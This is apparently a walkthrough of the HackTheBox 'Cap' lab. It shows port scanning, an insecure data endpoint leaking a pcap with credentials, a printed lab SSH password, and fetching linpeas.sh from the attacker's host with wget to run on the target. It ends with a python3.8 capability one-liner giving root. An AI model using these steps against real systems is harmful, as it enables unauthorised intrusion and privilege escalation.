Cap
A relatively easy Linux box in HackTheBox, you can root it in less than an hour.
nmap
(base) [psdon@arch cap]$ mkdir nmap
(base) [psdon@arch cap]$ sudo rustscan -a 10.10.10.245 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan A web server is running on port 80.
Web Enumeration
There's an interesting section in the sidebar which is located on /capture and when you go to that URL, you will be redirected to /data/<int>
Every time I visit /capture, the integer parameter in /data/1 was incrementing by 1.
So I change it to /data/0 and I got a pcap file, and I analyze it on wireshark and found a credentials on it.
Initial Shell
I login using that credentials on SSH, and looks like we got an initial shell. Sweet :D
(base) [psdon@arch cap]$ ssh nathan@10.10.10.245
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.
ED25519 key fingerprint is SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.245' (ED25519) to the list of known hosts.
nathan@10.10.10.245's password: Buck3tH4TF0RM3!
nathan@cap:~$Post Exploitation
First, let's transfer linpeas.sh from our machine to the target machine
(base) [psdon@arch CyberSploit1]$ cd /opt/peass/linPEAS/
(base) [psdon@arch linPEAS]$ ls
builder images linpeas.sh README.md
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... You can find the machine IP address by executing the following.
(base) [psdon@arch ~]$ ip a | grep tun0
9: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
inet 10.10.14.15/23 scope global tun0Then transfer the script using wget
nathan@cap:~$ wget http://10.10.14.15/linpeas.sh
--2021-08-29 19:09:04-- http://10.10.14.15/linpeas.sh
Connecting to 10.10.14.15:80... connected.
nathan@cap:~$ chmod +x linpeas.sh Then run linpeas.sh
nathan@cap:~$ ./linpeas.sh
ββββββββββββββ
βββββββ ββββββββ
βββββββ ββββββββββββββββββββ ββββ
ββββ β ββββββββββββββββββββββββββββββ ββββββ
β βββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββ βββββ βββββββββββββββββ
βββββββββββ ββββββ ββββββ β
ββββββ ββββββββ ββββ
ββ βββ βββββ βββ
ββ ββββββββββββ ββ
β ββ βββββββββββββββββββββββββββββ ββ
β βββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββ ββββ
βββββ βββββ ββββββ ββββ
ββββ βββββ βββββ β ββ
βββββ βββββ βββββββ βββββ βββββ
ββββββ βββββββ βββββββ βββββββ βββββ
ββββββββββββββ β βββββββββββββββ
βββββββββββββ ββββββββββββββ
βββββββββββ ββββββββββββββ
ββββββββββββββββββ ββββββββββββββββββββ
βββββ ββββββββββββββββββββββββββ βββββββββββββ
ββββββββ ββββββββββ ββββββββ
βββββββββββββββββββββββ
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop I noticed python3.8 binary was set a capability.
Privilege Escalation
We can gain root by executing the following command
nathan@cap:/var/www/html$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash");'
root@cap:/var/www/html# Last updated
Was this helpful?